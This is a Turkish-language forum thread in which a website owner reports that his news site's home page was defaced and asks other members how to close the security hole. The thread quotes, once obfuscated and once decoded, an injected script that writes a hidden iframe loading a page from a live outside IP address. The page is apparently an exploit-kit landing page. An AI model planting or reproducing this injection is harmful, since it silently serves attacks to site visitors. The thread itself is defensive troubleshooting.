<script type="text/javascript" language="JavaScript"> eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%3C%69%66%72%61%6D%65%20%73%72%63%3D%5C%22%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%35%30%2E%38%32%2F%6D%70%61%63%6B%2F%69%6E%64%65%78%2E%70%68%70%5C%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%73%74%79%6C%65%3D%5C%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%5C%22%3E%3C%2F%69%66%72%61%6D%65%3E%22%29%3B%0D%0A%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%3D%22%20%22%3B"));</script>

şeklinde bir java script yazısı cıkıyor ve codelerin tümü silinmiş siteye bir giriyorum ana sayfa boş kategoriler duruyor orta taraf ile sol taraf gitmiş bu açığı nasıl kapatabiliriz. ? bunu galiba haber ekleme muhabbetinden yapıyorlar ama mevzuyu çözemedim hala aramadan yapıyorlar galiba bunu ama neydir nasıl yapılır çözemedim. tüm acıklarıda kapattıgıma eminim... yönetici arkadaşlar igilenirlerse sevinirim.

dostum yanılmıyorsam cookie çalma işlemi yapmışlar ( xss için).Eğer ki senin sitenin scriptlerini felan editleyebiliyorlarsapanel şifreni ellerine geçirmiş olabilirler.

yok şuan bişey ama geçirmişte olabilirler. bir bilgim yok şimdi bunun çözümü nedir. ?

codelerden ögrendiğim kadarı ile rusların yaptıgı bir xss ile ilgili virüs gibi bişeymiş ya arkadaşlar allah rızası için yardım elini uzatıcak yokmu ?

Yazdığınız kodları decode edince aşağıdaki kodlar çıkıyor.

O uyarıyı hangi sayfada aldığınızı yazabilir misiniz?

[CODE]<script type="text/javascript" language="JavaScript"> eval(unescape("document.write("<iframe src=\"http://81.95.150.82/mpack/index.php\" widş=0 height=0 style=\"display:none\"></iframe>");
window.status=" ";"));</script>[/CODE]

dostum bu yazı anasayfadaydı bu verdiğim şeyede girmeseydin keşke şimdi ögrendim cokiesleri çalıyorlarmış inşallah şifrelerine zarar zeval gelmemiştir arkadaşım. kusura bakma özür dilerim. bunu direkt olarak anasayfaya koyuyorlar anasayfada arama acığı var galiba bu yüzden ve diğer 29 sitemde hacklendi
neyse yapıcak fazla birşey yok anasayfadan arama codelerini kaldırıp birde öyle deniyecegim olmassa yapıcak birşey yok zaten. bu arada sayfa default.asp abi bu xss açıklarını çok geliştirmişler ve mydesign haber sistemi bu açıklara karşı korumasız ben arama sayfasının defaut.asp içerisinde olmamasının kanısındayım. ara.asp sayfasında olsa bence daha makbul olur. neyse inşallah bu şekildedir problemde çözerim yoksa bende sitelerimi kapamak zorunda kalıcam :(

Aramayla ilgili de bir sorun yok. Formdan gelen tüm veriler filtreleniyor. Zaten aramayla ilgili bir açık olsa, ara.asp sayfasında da olur.

Sakıncası yoksa, veritabanını profilimdeki e-posta adresine yollar mısınız? Kodların, hangi editör tarafından, hangi alana eklendiğini inceleyelim..